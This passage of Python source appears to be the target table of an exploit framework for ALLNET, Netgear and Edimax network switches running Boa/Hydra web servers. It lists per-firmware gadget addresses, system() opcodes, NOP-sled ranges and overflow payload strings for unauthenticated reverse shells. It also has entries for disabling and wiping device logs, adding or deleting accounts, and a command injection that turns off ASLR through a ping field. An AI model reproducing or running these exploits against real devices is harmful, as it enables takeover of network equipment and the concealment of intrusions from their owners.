overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP': 0x10600604,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 987,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 69,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':False,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# ALLNET GmbH Computersysteme \r\n\t\t\t# JSON based SG8xxx\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'752-76347': {\r\n\t\t\t\t'model':'ALL-SG8208M',\r\n\t\t\t\t'template':'ALLNET_JSON',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'2.2.1',\t\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40C4FC,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998528,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x248498dc,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': 
False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()\r\n\t\t\t\t\t\t'log_settings_set':0x412ADC,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()\r\n\t\t\t\t\t\t'log_ramClear':0x412A24,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()\r\n\t\t\t\t\t\t'log_fileClear':0x412A24,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x40FA74,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x40FA74,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x40FA74,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()\r\n\t\t\t\t\t\t'START':0x7ffeff04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 77,\t\t\t\t\t# filler/garbage (not used for something 
constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# ALLNET GmbH Computersysteme \r\n\t\t\t# Not JSON based SG8xxx\r\n\t\t\t# (Traces in this image: 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology, Wanbroad, Plexonics, Mach Power, Gigamedia, TG-NET)\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : No\r\n\t\t\t# Del /mntlog/flash.log : No\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'222-50100': {\r\n\t\t\t\t'template':'ALLNET',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'3.1.1-R3-B1',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'ALL-SG8310PM',\t\t\t\t# Model\r\n\t\t\t\t'uri':'https://www.allnet.de/en/allnet-brand/produkte/switches/entry-line-layer2-smart-managed-unamanged/poe-switches0/p/allnet-all-sg8310pm-smart-managed-8-port-gigabit-4x-hpoe',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40C74C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system) # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x2484029c,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': 
False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_setting_post()\r\n\t\t\t\t\t\t'log_settings_set':0x46BB04,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_ramClear':0x46F240,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_fileClear':0x46F240,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x426724,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject CMD)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x426724,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x424D28,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable':False,\r\n\t\t\t\t\t}, \r\n\r\n\t\t\t\t\t# Interesting when there is a fresh heap with 0x00's (4 x 0x00 == MIPS NOP),\r\n\t\t\t\t\t# and to fill wider area with sending '&%8f%84%01=%8f%84%80%18' where:\r\n\t\t\t\t\t# \r\n\t\t\t\t\t# NOP's\r\n\t\t\t\t\t# '24%04%FF=' : '=' will be replaced with 0x00, li $a0, 0xFFFFFF00\r\n\t\t\t\t\t# '%24%04%FF%FF' : li $a0, 
0xFFFFFFFF\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'dispatcher.cgi',\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()\r\n\t\t\t\t\t\t'query':'username='+ self.random_string(112) +'_RA_START&password='+ self.random_string(80) +'&login=1'+ ('&%24%04%FF=%24%04%FF%FF' * 50) +'_SHELLCODE',\r\n\t\t\t\t\t\t'START':0x10010104,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP' :0x10600604,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 28,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 20,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':False,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Netgear inc.\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : No (logging do not exist)\r\n\t\t\t# Del /var/log/flash.log : No (logging do not exist)\r\n\t\t\t# Del /mntlog/flash.log : No (logging do not exist)\r\n\t\t\t# Add credentials : No (Single account only)\r\n\t\t\t# Del credentials : No (Single account only)\r\n\t\t\t#\r\n\t\t\t'609-31457': {\r\n\t\t\t\t'template':'Netgear',\t\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'model':'GS750E ProSAFE Plus Switch',\r\n\t\t\t\t'uri':'https://www.netgear.com/support/product/gs750e.aspx',\r\n\t\t\t\t'version':'1.0.0.22',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'encryption':'caesar',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&password=PASSWORD&err_flag=0&err_msg=&submt=&_de=1\":{}}',\r\n\t\t\t\t},\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'set.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"password\" (PoC: crash 
CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&password=' + self.random_string(320) + '&err_flag=0&err_msg=&submt=&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x4102F8,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f9984fc,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x24840c6c,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Interesting, by adding 0xc1c1c1c1 to START/STOP, remote end will decode to our original START/STOP (including 0x00) =]\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': 
False,\r\n\t\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t# /sqfs/home/web/cgi-bin/security.cgi; main()\r\n\t\t\t\t\t\t'START':0x10001210,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x10006210,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 50,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 79,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':False,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'query':'{\"_ds=1&password=' + self.random_string(316) + '_RA_START&shellcode=_USRNOP_SHELLCODE&_de=1\":{}}',\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Netgear inc.\r\n\t\t\t#\r\n\t\t\t# Note: \r\n\t\t\t# 'username' is vulnerable for stack overflow\r\n\t\t\t# 'pwd' use 'encode()' and not vulnerable for stack overflow (so we cannot jump with 'buffer method'...)\r\n\t\t\t# Boa/Hydra 'getFdStr()' loop modified, original xploit dont work (0x00 are now ok), weird 'solution' to have $t9 loaded with JMP in 'fwrite()'\r\n\t\t\t# 'hash=<MD5>' tailing all URI's\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : No\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : No\r\n\t\t\t# Del /var/log/flash.log : No\r\n\t\t\t# Del /mntlog/flash.log : No\r\n\t\t\t# Add credentials : No\r\n\t\t\t# Del credentials : No\r\n\t\t\t#\r\n\t\t\t'639-98866': {\r\n\t\t\t\t'template':'Netgear',\t\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'model':'GS728TPv2, GS728TPPv2, GS752TPv2, 
GS752TPP',\r\n\t\t\t\t'uri':'https://kb.netgear.com/000060184/GS728TPv2-GS728TPPv2-GS752TPv2-GS752TPP-Firmware-Version-6-0-0-45',\r\n\t\t\t\t'version':'6.0.0.45',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'hash_uri':True,\t# tailed 'hash=' md5 hashed URI as csrf token\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'encryption':'encode',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&username=USERNAME&pwd=PASSWORD&err_flag=0&err_msg=&submt=&_de=1\":{}}',\r\n\t\t\t\t},\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'set.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(100) +'&pwd=NOP&err_flag=0&err_msg=&submt=&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# \r\n\t\t\t\t\t\t'gadget': 0x45678C,\t\t\t\t# Direct heap address for NOP slep and shellcode\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99853c,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x2484ae5c,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 6,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'safe': False\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': 
False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'639-73124': {\r\n\t\t\t\t'template':'Netgear',\t\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'model':'GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP',\r\n\t\t\t\t'uri':'https://www.netgear.com/support/product/GS752TPv2#Firmware%20Version%206.0.0.37',\r\n\t\t\t\t'version':'6.0.0.37',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'hash_uri':True,\t# tailed 'hash=' md5 hashed URI as csrf token\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'encryption':'encode',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&username=USERNAME&pwd=PASSWORD&err_flag=0&err_msg=&submt=&_de=1\":{}}',\r\n\t\t\t\t},\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'set.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(100) +'&pwd=NOP&err_flag=0&err_msg=&submt=&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# \r\n\t\t\t\t\t\t'gadget': 0x45778C,\t\t\t\t# Direct heap address for NOP slep and shellcode\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998538,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x2484afec,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 6,\t\t\t\t\t\t# Should leave 
as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'safe': False\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# EdimaxPRO\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'225-63242': {\r\n\t\t\t\t'template':'Edimax',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'model':'GS-5424PLC',\r\n\t\t\t\t'uri':'https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/smb_switches_poe/gs-5424plc',\r\n\t\t\t\t'version':'1.1.1.5',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E6DC,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998524,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x248411bc,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# 
/sqfs/home/web/cgi/set.cgi; cgi_diag_traceroute_set()\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t'web_sys_ping_post':0x40DFF4,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&srvHost=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()\r\n\t\t\t\t\t\t'log_settings_set':0x41D99C,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_ramClear':0x41D8E4,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_fileClear':0x41D8E4,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x41620C,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x41620C,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x41620C,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': False,\t\t\t# Not clear, may be to long URI for the stack\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t\t# 
